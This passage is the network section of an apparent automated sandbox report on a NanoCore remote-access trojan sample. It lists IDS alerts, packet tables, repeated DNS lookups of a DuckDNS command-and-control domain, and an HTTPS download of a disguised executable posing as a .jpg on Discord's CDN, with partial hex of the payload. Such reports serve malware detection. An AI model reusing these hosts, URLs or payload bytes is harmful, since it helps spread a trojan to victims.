                                                                                              09/27/21-20:29:03.518255UDP254DNS SPOOF query response with TTL of 1 min. and no authority53503948.8.8.8192.168.2.5
                                                                                              09/27/21-20:29:03.803544TCP2025019ET TROJAN Possible NanoCore C2 60B497656746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:29:09.886155TCP2025019ET TROJAN Possible NanoCore C2 60B497686746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:29:17.307627TCP2025019ET TROJAN Possible NanoCore C2 60B497706746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:29:22.315778UDP254DNS SPOOF query response with TTL of 1 min. and no authority53544508.8.8.8192.168.2.5
                                                                                              09/27/21-20:29:22.518706TCP2025019ET TROJAN Possible NanoCore C2 60B497776746192.168.2.5194.147.140.25
                                                                                              09/27/21-20:29:28.676868TCP2025019ET TROJAN Possible NanoCore C2 60B497786746192.168.2.5194.147.140.25

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Sep 27, 2021 20:27:26.429685116 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.429738045 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.429838896 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.462435961 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.462490082 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.507787943 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.507915974 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.511149883 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.511190891 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.511531115 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.553986073 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.928710938 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.971151114 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.985599995 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.985692978 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.985757113 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.985773087 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.985836029 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.985851049 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986102104 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986116886 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986144066 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986155987 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986162901 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.986191034 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.986217022 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.986659050 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986740112 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986795902 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.986812115 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.986870050 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.987081051 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.987884045 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.987987995 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:26.988006115 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.988066912 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.001815081 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.006230116 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.007817030 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.007850885 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008188963 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008268118 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008281946 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008346081 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008353949 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008415937 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008424997 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008486986 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008493900 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008546114 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008553982 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008620977 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008629084 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008687973 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008701086 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008759022 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008765936 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.008831978 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.008892059 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.009042978 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.009052992 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.009116888 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.009124041 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.009182930 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.014429092 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.014702082 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.015481949 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.015501022 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.015515089 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.015571117 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.033581018 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.033657074 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.035645962 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.041142941 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.041184902 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.041208982 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.041214943 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.041296959 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044169903 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044243097 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044277906 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044315100 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044332027 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044341087 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044374943 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044384956 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044410944 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044433117 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044477940 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044490099 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044524908 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044548035 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044563055 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044584990 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044603109 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044658899 CEST49736443192.168.2.5162.159.133.233
                                                                                              Sep 27, 2021 20:27:27.044661045 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044677019 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044725895 CEST44349736162.159.133.233192.168.2.5
                                                                                              Sep 27, 2021 20:27:27.044729948 CEST49736443192.168.2.5162.159.133.233

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Sep 27, 2021 20:27:18.893395901 CEST6180553192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:18.912765980 CEST53618058.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:26.381520033 CEST5479553192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST53547958.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:37.892949104 CEST4955753192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:37.939060926 CEST53495578.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:43.757028103 CEST6173353192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:43.871459007 CEST53617338.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:44.152842045 CEST6544753192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST53654478.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:52.196728945 CEST5244153192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:52.311805964 CEST53524418.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:56.380662918 CEST6217653192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST53621768.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:56.896708012 CEST5959653192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:56.910274029 CEST53595968.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:27:58.862592936 CEST6529653192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:27:58.876029015 CEST53652968.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:01.087872982 CEST6318353192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:01.201807976 CEST53631838.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:05.916563034 CEST6015153192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:05.951703072 CEST53601518.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:09.364130974 CEST5696953192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:09.480817080 CEST53569698.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:16.175236940 CEST5516153192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:16.188071012 CEST53551618.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:23.356420040 CEST5475753192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:23.369410038 CEST53547578.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:23.958440065 CEST4999253192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:23.972385883 CEST53499928.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:30.489710093 CEST6007553192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:30.502984047 CEST53600758.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:30.968918085 CEST5501653192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:30.982316017 CEST53550168.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:37.686520100 CEST6434553192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:37.800653934 CEST53643458.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:44.689848900 CEST5712853192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:44.803364992 CEST53571288.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:51.690846920 CEST5479153192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:51.703828096 CEST53547918.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:28:56.757100105 CEST5046353192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:28:56.771413088 CEST53504638.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:03.402982950 CEST5039453192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:03.518254995 CEST53503948.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:04.019557953 CEST5853053192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:04.052088022 CEST53585308.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:09.674375057 CEST5381353192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:09.688108921 CEST53538138.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:16.965398073 CEST6373253192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:16.985893011 CEST53637328.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:17.089837074 CEST5734453192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:17.102885008 CEST53573448.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:22.199737072 CEST5445053192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:22.315778017 CEST53544508.8.8.8192.168.2.5
                                                                                              Sep 27, 2021 20:29:28.461555958 CEST5926153192.168.2.58.8.8.8
                                                                                              Sep 27, 2021 20:29:28.475239992 CEST53592618.8.8.8192.168.2.5

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                              Sep 27, 2021 20:27:26.381520033 CEST192.168.2.58.8.8.80xc1c6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:43.757028103 CEST192.168.2.58.8.8.80x74a8Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.152842045 CEST192.168.2.58.8.8.80xcc68Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:52.196728945 CEST192.168.2.58.8.8.80x945Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.380662918 CEST192.168.2.58.8.8.80x326cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:01.087872982 CEST192.168.2.58.8.8.80x42d2Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:09.364130974 CEST192.168.2.58.8.8.80xa1ddStandard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:16.175236940 CEST192.168.2.58.8.8.80x903eStandard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:23.958440065 CEST192.168.2.58.8.8.80x5c5dStandard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:30.968918085 CEST192.168.2.58.8.8.80x1d94Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:37.686520100 CEST192.168.2.58.8.8.80x8b0Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:44.689848900 CEST192.168.2.58.8.8.80x5ac8Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:51.690846920 CEST192.168.2.58.8.8.80x520fStandard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:56.757100105 CEST192.168.2.58.8.8.80x11c4Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:03.402982950 CEST192.168.2.58.8.8.80x96dcStandard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:09.674375057 CEST192.168.2.58.8.8.80x3331Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:17.089837074 CEST192.168.2.58.8.8.80xfb61Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:22.199737072 CEST192.168.2.58.8.8.80xafc0Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:28.461555958 CEST192.168.2.58.8.8.80x9337Standard query (0)friomo.duckdns.orgA (IP address)IN (0x0001)

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST8.8.8.8192.168.2.50xc1c6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST8.8.8.8192.168.2.50xc1c6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST8.8.8.8192.168.2.50xc1c6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST8.8.8.8192.168.2.50xc1c6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:26.402285099 CEST8.8.8.8192.168.2.50xc1c6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:43.871459007 CEST8.8.8.8192.168.2.50x74a8No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST8.8.8.8192.168.2.50xcc68No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST8.8.8.8192.168.2.50xcc68No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST8.8.8.8192.168.2.50xcc68No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST8.8.8.8192.168.2.50xcc68No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:44.166497946 CEST8.8.8.8192.168.2.50xcc68No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:52.311805964 CEST8.8.8.8192.168.2.50x945No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST8.8.8.8192.168.2.50x326cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST8.8.8.8192.168.2.50x326cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST8.8.8.8192.168.2.50x326cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST8.8.8.8192.168.2.50x326cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:27:56.399869919 CEST8.8.8.8192.168.2.50x326cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:01.201807976 CEST8.8.8.8192.168.2.50x42d2No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:09.480817080 CEST8.8.8.8192.168.2.50xa1ddNo error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:16.188071012 CEST8.8.8.8192.168.2.50x903eNo error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:23.972385883 CEST8.8.8.8192.168.2.50x5c5dNo error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:30.982316017 CEST8.8.8.8192.168.2.50x1d94No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:37.800653934 CEST8.8.8.8192.168.2.50x8b0No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:44.803364992 CEST8.8.8.8192.168.2.50x5ac8No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:51.703828096 CEST8.8.8.8192.168.2.50x520fNo error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:28:56.771413088 CEST8.8.8.8192.168.2.50x11c4No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:03.518254995 CEST8.8.8.8192.168.2.50x96dcNo error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:09.688108921 CEST8.8.8.8192.168.2.50x3331No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:17.102885008 CEST8.8.8.8192.168.2.50xfb61No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:22.315778017 CEST8.8.8.8192.168.2.50xafc0No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)
                                                                                              Sep 27, 2021 20:29:28.475239992 CEST8.8.8.8192.168.2.50x9337No error (0)friomo.duckdns.org194.147.140.25A (IP address)IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • cdn.discordapp.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.549736162.159.133.233443C:\Users\user\Desktop\s9SWgUgyO5.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-09-27 18:27:26 UTC0OUTGET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1
                                                                                              Host: cdn.discordapp.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-09-27 18:27:26 UTC0INHTTP/1.1 200 OK
                                                                                              Date: Mon, 27 Sep 2021 18:27:26 GMT
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Length: 1729443
                                                                                              Connection: close
                                                                                              CF-Ray: 6956c93d6876e8fb-MXP
                                                                                              Accept-Ranges: bytes
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              ETag: "2ac5f86f290ec12916b30b63f8da6e5d"
                                                                                              Expires: Tue, 27 Sep 2022 18:27:26 GMT
                                                                                              Last-Modified: Thu, 23 Sep 2021 20:00:54 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: MISS
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1632427254972338
                                                                                              x-goog-hash: crc32c=rCGZkw==
                                                                                              x-goog-hash: md5=KsX4bykOwSkWswtj+NpuXQ==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 1729443
                                                                                              X-GUploader-UploadID: ADPycdsfSu6fJtDW9HkahbvMR-roS5LUPKi7V3J3d7FUAokax5jZBtayADlbxIAInHxVI5ODwjSxTSzUsmwOnTRs4zDOFAag8w
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4tbYyDxYv%2B9YNQYFhn5mSL7X1f975evUHcPTctC2b6h37BrinyJHNUZkJElQkOiItx7VrcuHSQAxbniDRfk%2FTHhfg7b8vkmL4hQINYDjOYA%2BsoVZM0qbspd30pUHRuD%2BJMtCtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2021-09-27 18:27:26 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2021-09-27 18:27:26 UTC1INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
                                                                                              Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                                                                                              2021-09-27 18:27:26 UTC2INData Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 35 20 34 30 20 32 32 39 20 31 30 39 20 31 31 35 20 35 30 20 34 38 20 35 30 20 35 30 20 38 34 20 31 31 34 20 31 31 37 20 31 34 36 20 31 34 33 20 35 30 20 34 38 20 31 33 38 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 31 32 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 37 36 20 35 30
